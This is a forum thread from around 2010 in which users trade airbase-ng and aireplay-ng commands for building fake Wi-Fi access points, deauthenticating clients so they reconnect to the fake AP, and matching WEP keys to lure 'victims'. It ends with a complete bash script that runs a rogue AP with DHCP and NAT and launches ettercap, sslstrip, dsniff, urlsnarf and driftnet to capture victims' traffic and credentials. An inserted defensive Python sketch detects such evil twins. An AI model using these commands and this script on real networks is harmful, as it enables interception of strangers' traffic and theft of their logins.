You guys totally hijacked Lucifer's thread.
when using airbase I use this command to set up the AP:
Code: sudo airbase-ng -c 11 -a (MAC address of router) -e (access point name) -z 2 -W 1 -F capture mon0
and this to deauth them:
Code: sudo aireplay-ng -0 10 -a (MAC of router) -c (client access point) mon0
I am a complete newb at this and I put this together myself. Not sure what to do after it, as I'm using Ubuntu and am downloading BT4 for better results, but I had a successful connection from an auto-connect after using the first command to set up the AP and then deauth to force a reconnect to my AP. Have not got as far as trying to sniff yet.
Hey, best (HOW TO) yet, I gave it 5 stars. One question though: I was watching the creators of airdrop and I'm still kind of confused on how to write the rules. I'm pretty sure I'll get it once I use it, but a little advice never hurts.
Stand up and be counted as a linux user.
- kherkhere; this tutorial is not for sniffing wireless encryption keys.
- halfdone; search for g0tmi1k's bt4pre-final script, or maybe Nick the Greek's script. I do have to mention that both these scripts weren't working for me personally.
- mikeyxb; get BT4 Final instead of Ubuntu. And if you're a 'complete newb' like you've said yourself, then start off with the very basics like in my tut, aka airbase-ng -e wifree mon0
- enc0de; glad you like it. Try airdrop-ng --help, and read through it carefully. I couldn't explain it any better.
Good luck guys
Last edited by Lucifer; 04-09-2010 at 10:46 PM.
for those who've been messing with fake APs, it's really important that you understand the following:
this is an example:
a client 'A1' is connected to his AP 'AA' with ESSID 'wireless' and WEP key '123456'
if you now would deauth this client from his AP and set up a fake AP like:
airbase-ng -e wireless -W 1 mon0
then the client would reconnect to your fake AP since the correct ESSID and WEP flag are set, but the problem would be that the client is sending his packets encrypted with the key '123456' and airbase cannot decrypt them since you didn't specify a key. the windows/mac client (victim) associated because the ESSID and encryption match his real AP, BUUUT no communication between fake AP and client is possible since you didn't specify the key airbase should use to decrypt the packets. failure.
having said this, in this example, you would need to start airbase this way:
airbase-ng -e wireless -w 123456 mon0
correct ESSID, correct WEP key the client is using + deauth the client with airdrop from his real AP => victim instantly connects to your fake AP, aka success
you could of course, in this example, set airbase-ng -e wireless mon0 and wait for the victim to manually connect to your fake AP, but that can take ages. it's all about the windows/mac auto-reconnect function, which only cares about the ESSID and the encryption to reconnect, get it.
I hope that makes some sense as this principle is fundamental for windows/mac victims.
NOTE: this only applies to WEP clients, since it's not possible to set WPA encryption in airbase yet. for WPA clients, you can only set the correct ESSID in airbase and wait until the client manually connects to your fake AP, but again, this can take ages and requires clients that are stupid.
Last edited by Lucifer; 04-09-2010 at 11:43 PM.
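Added example (not from the thread): the same rule the post above describes, seen from the defender's side. An auto-reconnecting client only checks ESSID plus the privacy (encryption) flag, so a monitor that watches beacons for a known ESSID can flag a foreign BSSID with matching flags as the case that would actually lure clients, and a cloned BSSID on the wrong channel as the other trick mentioned in the thread. The allowlisted BSSID and channel are constructed placeholders, and beacons are built inline rather than captured.

```python
from dataclasses import dataclass

@dataclass(frozen=True)
class Beacon:
    bssid: str
    essid: str
    privacy: bool   # capability "privacy" bit: set for WEP and WPA networks
    channel: int

# Constructed allowlist for the legitimate AP "wireless" from the post above.
# The BSSID and channel are placeholders, not values from the thread.
KNOWN_APS = {
    "wireless": {"bssid": "00:11:22:33:44:55", "privacy": True, "channel": 6},
}

def classify(beacon: Beacon) -> str:
    """Return a verdict for one beacon against the allowlist."""
    legit = KNOWN_APS.get(beacon.essid)
    if legit is None:
        return "unknown-essid"
    same_bssid = beacon.bssid.lower() == legit["bssid"].lower()
    same_flags = beacon.privacy == legit["privacy"]
    if same_bssid:
        if beacon.channel != legit["channel"] or not same_flags:
            # Our own BSSID seen on another channel or with other capability
            # bits: consistent with a cloned BSSID rather than our real AP.
            return "bssid-clone-suspect"
        return "legit"
    # Same ESSID from a foreign BSSID. Clients that auto-reconnect on ESSID
    # plus encryption flag alone are only exposed when the privacy bit matches.
    return "evil-twin-matching-flags" if same_flags else "evil-twin-flag-mismatch"

def scan(beacons):
    """Classify every beacon and return only the ones worth alerting on."""
    verdicts = [(b.bssid, b.essid, classify(b)) for b in beacons]
    return [v for v in verdicts if v[2] != "legit"]

# Constructed sample beacons: the real AP, a twin with matching flags,
# a twin without the privacy bit, and our BSSID cloned onto channel 11.
SAMPLE = [
    Beacon("00:11:22:33:44:55", "wireless", True, 6),
    Beacon("aa:bb:cc:dd:ee:ff", "wireless", True, 11),
    Beacon("aa:bb:cc:dd:ee:ff", "wireless", False, 11),
    Beacon("00:11:22:33:44:55", "wireless", True, 11),
]

if __name__ == "__main__":
    for bssid, essid, verdict in scan(SAMPLE):
        print(f"{bssid} {essid}: {verdict}")
```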
Right, ok, I have sussed this one now, but is it possible to get the client to connect to my proxy for the internet connection? I use my adb android localhost proxy on port 8080, so I will be connecting the client to my fake AP with that proxy as the internet access. Would everything be the same, or would it need some extra command lines somewhere in the conf file? And to use apt I have to do this command:
Code: export http_proxy=http://localhost:8080
Would I have to put that in place somewhere or not?
Hi Lucifer!
I have followed your tutorial and have almost made it through.
My issue is that when I'm done, clients can connect and get DHCP but not Internet...
I have checked several times that my gateway (192.168.0.1) and interfaces (eth1 & wlan0/mon0) are correct.
Internet on the host machine(bt4) is working.
Do you have any clues?
mikeyxb; I'm afraid this goes beyond my knowledge as well, ask a BT guru
ap/dc; what wireless card are you using?
A: Make sure you've got what's NEEDED (look at the beginning of my tutorial)
B: Try playing around with your wireless card's MTU values
(ifconfig wlan0 MTU 1400, 1500 or 1800, and ifconfig mon0 MTU 1400, 1500, or 1800, mess around with some combinations)
C: Maybe the MITM tools are causing you trouble. try again without them, do all the steps from 1 to 7, and leave this command out: iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
D: If it still doesn't work and you happen to have got a second pc/laptop, repeat all the tutorial's steps on this different machine to see if it helps. I've also got some problems with fake APs on my laptop, it only works on my older pc.
EDIT: also play around with the at0 MTU value.
cheers,
Last edited by Lucifer; 04-11-2010 at 07:56 PM.
#!/bin/bash
#----------------------------------------------------------------------#
# This script is what I have taken from a script I found on the old BT
# forums by Deathray. I modified it to fit my needs. -l3g10n
#----------------------------------------------------------------------#
# Must be run as root: it reconfigures interfaces, iptables and dhcpd.
echo -n "Enter the name of the interface connected to the internet, for example eth0: "
read -e IFACE
airmon-ng
echo -n "Enter your wireless interface name, for example wlan0: "
read -e WIFACE
echo -n "Enter the ESSID you would like your rogue AP to be called, for example Free WiFi: "
read -e ESSID
# Clean up anything left over from a previous run
kill `cat /var/run/dhcp3-server/dhcpd.pid`
killall -9 dhcpd airbase-ng ettercap sslstrip driftnet urlsnarf
# Put the wireless card into monitor mode (on BT4 airmon-ng creates mon0)
airmon-ng stop $WIFACE
ifconfig $WIFACE down
airmon-ng start $WIFACE
ifconfig $WIFACE up
modprobe tun
echo Airbase-ng is going to create our fake AP with the SSID we specified
xterm -e airbase-ng -e "$ESSID" -P -C 30 -v mon0 &
sleep 10
# at0 is the tap interface airbase-ng creates for the fake AP's clients
echo Configuring the at0 interface created by airbase-ng
ifconfig at0 up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
echo 'Setting up iptables to handle traffic seen by the airbase-ng (at0) interface'
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -P FORWARD ACCEPT
# NAT the at0 subnet out through the internet-facing interface
iptables -t nat -A POSTROUTING -o $IFACE -j MASQUERADE
echo Creating a dhcpd.conf to assign addresses to clients that connect to us
echo "default-lease-time 600;" > dhcpd.conf
echo "max-lease-time 720;" >> dhcpd.conf
echo "ddns-update-style none;" >> dhcpd.conf
echo "authoritative;" >> dhcpd.conf
echo "log-facility local7;" >> dhcpd.conf
echo "subnet 10.0.0.0 netmask 255.255.255.0 {" >> dhcpd.conf
echo "range 10.0.0.100 10.0.0.254;" >> dhcpd.conf
echo "option routers 10.0.0.1;" >> dhcpd.conf
echo "option domain-name-servers 8.8.8.8;" >> dhcpd.conf
echo "}" >> dhcpd.conf
echo 'DHCP server starting on our airbase-ng interface (at0)'
dhcpd3 -f -cf dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.pid at0 &
xterm -e tail -f /var/log/messages &
#echo "Launching ettercap, poisoning all hosts on the at0 interface's subnet"
xterm -e ettercap -T -q -p -l ettercap$(date +%F-%H%M).log -i at0 // // &
sleep 8
echo 'Configuring ip forwarding'
echo "1" > /proc/sys/net/ipv4/ip_forward
echo 'Launching various tools'
xterm -e sslstrip -a -k -f &
driftnet -v -i at0 &
xterm -e urlsnarf -i at0 &
xterm -e dsniff -m -i at0 -d -w dsniff$(date +%F-%H%M).log &
Last edited by l3g10n; 04-12-2010 at 12:38 AM.